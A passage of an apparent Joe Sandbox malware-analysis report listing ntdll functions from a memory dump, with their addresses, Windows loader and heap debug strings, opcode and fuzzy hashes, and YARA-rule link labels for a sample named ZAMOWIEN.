RtlDebugPrintTimes.NTDLL ref: 328CA895
RtlDebugPrintTimes.NTDLL ref: 328CA8E8
RtlDebugPrintTimes.NTDLL ref: 328CA907
RtlDebugPrintTimes.NTDLL ref: 328CA938

Strings

HEAP: , xrefs: 328CA686

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 80d1b06163b8a81653ca0714e6050355d6bd9fc3d6e1dfa82bd11294f37cf6da
Instruction ID: 40292a45197e9ae4f63b48bd34eaa167ffac38c570e0dd617fed3bf65518cf44
Opcode Fuzzy Hash: 80d1b06163b8a81653ca0714e6050355d6bd9fc3d6e1dfa82bd11294f37cf6da
Instruction Fuzzy Hash: 4AA1AE79A183218FD708CE28C890A5AB7E5FF88354F05496DE989DB350EB70DC46CB91

Function 32827630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Execute=1, xrefs: 32864713
ExecuteOptions, xrefs: 328646A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 32864787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32864742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32864725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 328646FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32864655

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 40a3fa420e2f238464b0d140545d5e8f3c8cf53de40f08f315b900ad3634dc37
Instruction ID: fedad007f0fdfcac708e9fe7bd5e9ea5280c7a6a170e23b5db1241c39cbc4cf0
Opcode Fuzzy Hash: 40a3fa420e2f238464b0d140545d5e8f3c8cf53de40f08f315b900ad3634dc37
Instruction Fuzzy Hash: 0351297D60131DAEFB11DAAADC85FAD77B8BF14344F4000E9DA18AB181EB709A85CF50

Function 3280A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

SsHd, xrefs: 3280A3E4
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32857AE6
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328579FA
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328579D5
Actx , xrefs: 32857A0C, 32857A73
RtlpFindActivationContextSection_CheckParameters, xrefs: 328579D0, 328579F5

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 79681414200eb859aedf6e2e8877a1ff55503c5f2aeddd746a2d72b555f3b911
Instruction ID: 5385fc8b1e36b336ff756b8402a9a507bf5d12d679bf5c3a146c3f8a66664b0a
Opcode Fuzzy Hash: 79681414200eb859aedf6e2e8877a1ff55503c5f2aeddd746a2d72b555f3b911
Instruction Fuzzy Hash: 74E1D07D6043019FE715CE24CC84B9AB7E1BB88358F54CA2DFA698B291DB31D949CF41

Function 3286FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3286FE73
RtlDebugPrintTimes.NTDLL ref: 3286FE95

Strings

Unknown, xrefs: 3286FDC2, 3286FDD4
LdrpRedirectDelayloadFailure, xrefs: 3286FDDE
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 3286FDD8
minkernel\ntdll\ldrdload.c, xrefs: 3286FDE8
$, xrefs: 3286FE3D

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 3c9428472764ff48cfb43c4aa738dd4472dfdb6214944ee661f3aa8391950afc
Instruction ID: f68cc1d9bb7571a92e73d0ad83a40b88d60ac9014131e1ddb440c9018aa4fbeb
Opcode Fuzzy Hash: 3c9428472764ff48cfb43c4aa738dd4472dfdb6214944ee661f3aa8391950afc
Instruction Fuzzy Hash: 8E4180B9A01208ABDB01DF99C940AEEBFB5BF58308F100059EE19AB341C771ED51CB90

Function 3289FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3289FDAE

Strings

About to free block at %p with tag %ws, xrefs: 3289FF7E
HEAP: , xrefs: 3289FE79, 3289FF64
About to free block at %p, xrefs: 3289FE8A
HEAP[%wZ]: , xrefs: 3289FE6C, 3289FF57
RtlFreeHeap, xrefs: 3289FDC8, 3289FE32

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: 91eb042f33c4a8db1b4b311687790180d99cd614cfe60337b3768c809019c810
Instruction ID: 8286259fc298c8ceac4f4914f935de2aebd2c5b1f2b746e68d7b7b7fbb945234
Opcode Fuzzy Hash: 91eb042f33c4a8db1b4b311687790180d99cd614cfe60337b3768c809019c810
Instruction Fuzzy Hash: 1371CE79911289DFDB0ACFA8C4507EEFBF2BF5A304F048459E449AB692CF719981CB50

Function 327E65B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 327E6664
RtlDebugPrintTimes.NTDLL ref: 327E66AF

Strings

Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32849AB4
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32849AF6
minkernel\ntdll\ldrinit.c, xrefs: 32849AC5, 32849B06
LdrpLoadShimEngine, xrefs: 32849ABB, 32849AFC

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 3638be64b0762a591eb284aeca2a2f4f32a5526ca963c8c20ea16ac75707b1ad
Instruction ID: 3add09165659ad3ffd28be0af97833d6a0e0cc83e116fca05fa46010c6dbad48
Opcode Fuzzy Hash: 3638be64b0762a591eb284aeca2a2f4f32a5526ca963c8c20ea16ac75707b1ad
Instruction Fuzzy Hash: 0D510379B21358DFDB24DB6CCC45BAD77A2BB44304F04056AE551BF295DBB0AC82CBA0

Function 328C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: c2fff0736d544ef8630d9ecc665d0d16cc5f386081320cfb11007924adbfbe18
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 2C0225B9508361AFD305CF28C490A6BF7E5EFC8714F508A2DFA984B264DB71E905CB42

Function 3283B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 3283B6BF

Strings

+, xrefs: 3283B65A
-, xrefs: 3283B650
0, xrefs: 3283B66F
0, xrefs: 3283B695

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 7ae3be4af1e76589af01a944c6e4f33a8d73cd1016331207c91cc02ad3f4610d
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 2081C1FCE072498FEF068E6CC8517EEBBA1EF45394F54451ADA64A7292DB348840CBD0

Function 327F9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 32852559

Strings

@, xrefs: 327F9175
$, xrefs: 327F9191

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: b32f26b40b4a456f0dcbc6e29ea5a405355e735b7ab3ff858451ad1cf5e65602
Instruction ID: 6e668eb773aa8d0971c0b27ccb89ded69c991fe0a4fae406ae745be8344278de
Opcode Fuzzy Hash: b32f26b40b4a456f0dcbc6e29ea5a405355e735b7ab3ff858451ad1cf5e65602
Instruction Fuzzy Hash: B9811CB9D00269DBDB25CF54CC44BDEB7B4AB08754F1041EAA919B7280DB719E85CFA0

Function 32824D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 32824D64

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3286362F
LdrpFindDllActivationContext, xrefs: 32863636, 32863662
minkernel\ntdll\ldrsnap.c, xrefs: 32863640, 3286366C
Querying the active activation context failed with status 0x%08lx, xrefs: 3286365C

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 55d54f949deed617a8b58c6d775ad208d145ffab09a61799226008a7d1800b90
Instruction ID: 0d1b22004ee3452e6b52e0d96bb7625c856b81941458d7fd1590d3369c65e948
Opcode Fuzzy Hash: 55d54f949deed617a8b58c6d775ad208d145ffab09a61799226008a7d1800b90
Instruction Fuzzy Hash: A931D3BE941755EEEB119B08C848B6577A4FB01B98F42416AED0C67291DFA0BCC0CAB5

Function 3281245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3285A992
LdrpDynamicShimModule, xrefs: 3285A998
minkernel\ntdll\ldrinit.c, xrefs: 3285A9A2
TG|2, xrefs: 32812462

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG|2$minkernel\ntdll\ldrinit.c
API String ID: 0-2063368474
Opcode ID: 8278036ccae39f640a20038e609a35968319a6ea869ef8cbd6142a71ffbf6f92
Instruction ID: 7c71f3620f322411493f8fc82fa8480ad03c3feb52c387559d99910f84caf844
Opcode Fuzzy Hash: 8278036ccae39f640a20038e609a35968319a6ea869ef8cbd6142a71ffbf6f92
Instruction Fuzzy Hash: 0831597D651325EBE7159F58C881FAA7BB5FB84754F224459F9247B280CBB06CC2CB80

Function 328A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 328A214F
___swprintf_l.LIBCMT ref: 328A2172

Strings

[, xrefs: 328A212B
]:%u, xrefs: 328A2169
%%%u, xrefs: 328A2146

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 2c08b11d669834ba288fdcde6ab1eefaa019da339b6ce859fcd03ee9ade38ac2
Instruction ID: fc7f4deff489ac3834a86976f8ec4c4b57c8c3fd0da01d75a1787b058b5affb3
Opcode Fuzzy Hash: 2c08b11d669834ba288fdcde6ab1eefaa019da339b6ce859fcd03ee9ade38ac2
Instruction Fuzzy Hash: CE2153BE900119ABDB21DE69CC50AAE7BE8AF54744F440116E955E3204EF30E9118BA1

Function 327EF910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3284E790

Strings

HEAP: , xrefs: 3284E70E
(HeapHandle != NULL), xrefs: 3284E719
HEAP[%wZ]: , xrefs: 3284E701

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: c776ea4110c3264134c12d29839e31538c22e2e000ca532b67c334f6c03ab54b
Instruction ID: 349e5834fd38f9d8c44da3a475b38f1ab638fbc4012385edc7f4ab8f8545d688
Opcode Fuzzy Hash: c776ea4110c3264134c12d29839e31538c22e2e000ca532b67c334f6c03ab54b
Instruction Fuzzy Hash: DE913579704741DFE716CF28C884B2AB7A5BF41784F004459E956AFA90DF74E842CBE2

Function 32810BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 32810CDC

Strings

LdrpCheckModule, xrefs: 3285A117
Failed to allocated memory for shimmed module list, xrefs: 3285A10F
minkernel\ntdll\ldrinit.c, xrefs: 3285A121

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: f9f04c2b749ce3a018e194cbec737713c0bf866c532f623c8df67b335bff36f0
Instruction ID: 6afc3749d87d6fea17741e2a7314b2991206b2df0342a6e349aedbf376296101
Opcode Fuzzy Hash: f9f04c2b749ce3a018e194cbec737713c0bf866c532f623c8df67b335bff36f0
Instruction Fuzzy Hash: CA719F78A00209DFEB09DF69CD80BAEB7F5FB48304F144469D916EB290E774A986CF50

Function 328C8927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 328C8B03
RtlDebugPrintTimes.NTDLL ref: 328C8B5B

Part of subcall function 32832B60: LdrInitializeThunk.NTDLL ref: 32832B6A

Strings

File, xrefs: 328C89EB
, xrefs: 328C8A53

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes$InitializeThunk
String ID: $File
API String ID: 1259822791-2412145507
Opcode ID: bff601f6e65d941d3361e5ae1fcacd9ed304e777cb3003ed04c252c6cd27ad31
Instruction ID: a4ad4da26bb0a816c0fd267fe7e6e7c6105a21030f355b034ebb88ee3bad2425
Opcode Fuzzy Hash: bff601f6e65d941d3361e5ae1fcacd9ed304e777cb3003ed04c252c6cd27ad31
Instruction Fuzzy Hash: B961AF75A5122CABDB278F28DC41BE9B7B9AB48704F4045E9E609E7181DB709F84CF50

Function 32819803 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 32819A02

Strings

Unmapping DLL "%wZ", xrefs: 3285DCE4
minkernel\ntdll\ldrsnap.c, xrefs: 3285DCF5
LdrpUnloadNode, xrefs: 3285DCEB

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 5c61ba3068ec0118fbacc13eb31b6ca0a678184a025dcd34ed7962bf32df5df7
Instruction ID: eded325b1e738da02153aae15239ea37a09fabcc102216e38db2f2f418141a6c
Opcode Fuzzy Hash: 5c61ba3068ec0118fbacc13eb31b6ca0a678184a025dcd34ed7962bf32df5df7
Instruction Fuzzy Hash: 6151067D704701AFE715DF28C884B29B7A1BB84314F14066DE8AB9B2D5DBB0B846CB91

Function 3282C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3282C7BF

Strings

Failed to reallocate the system dirs string !, xrefs: 328682D7
minkernel\ntdll\ldrinit.c, xrefs: 328682E8
LdrpInitializePerUserWindowsDirectory, xrefs: 328682DE

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: e4e11ea286f9cb8c727701142d4c91bfdac19ffc49a4e981e6f5727097b8e6f8
Instruction ID: 960cc37031ea76a208afb176f6414df6723c6aef4ad868cb9656809ad61f061d
Opcode Fuzzy Hash: e4e11ea286f9cb8c727701142d4c91bfdac19ffc49a4e981e6f5727097b8e6f8
Instruction Fuzzy Hash: C041F2B9562310EFD720DF28CC40B6B77E8BF45754F01492AB958A7290EBB1D881CB91

Function 3282BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 32867B7F
RTL: Re-Waiting, xrefs: 32867BAC
RTL: Resource at %p, xrefs: 32867B8E

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 5d308533dddee7f996d71ae072493678cb643c0cd4c34d7b81e281586077bcab
Instruction ID: 5dbda9087bd4edb94e7343b4ad8c91a317ea9fc80002fcf910c374c9137d6a44
Opcode Fuzzy Hash: 5d308533dddee7f996d71ae072493678cb643c0cd4c34d7b81e281586077bcab
Instruction Fuzzy Hash: 9841133D7027028FE714CE29C840B6AB7E5EF98324F000A2DF969DB680DB70E845CB91

Function 3282B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3286728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 32867294
RTL: Re-Waiting, xrefs: 328672C1
RTL: Resource at %p, xrefs: 328672A3

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: c5b6d3118ee9188976fe4d41db0f66c3a613051542923b2bd742213dfb8ce22f
Instruction ID: 6075cd61074ccc768c4fb7cbdb3600dfc544a39376bf24b402bf0a6b0102a64b
Opcode Fuzzy Hash: c5b6d3118ee9188976fe4d41db0f66c3a613051542923b2bd742213dfb8ce22f
Instruction Fuzzy Hash: CC41DE3D601346AFE710CE29CC81B66B7A5FF54718F104619FE69AB280DB71E896CBD0

Function 32874755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 32874809

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32874888
minkernel\ntdll\ldrredirect.c, xrefs: 32874899
LdrpCheckRedirection, xrefs: 3287488F

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

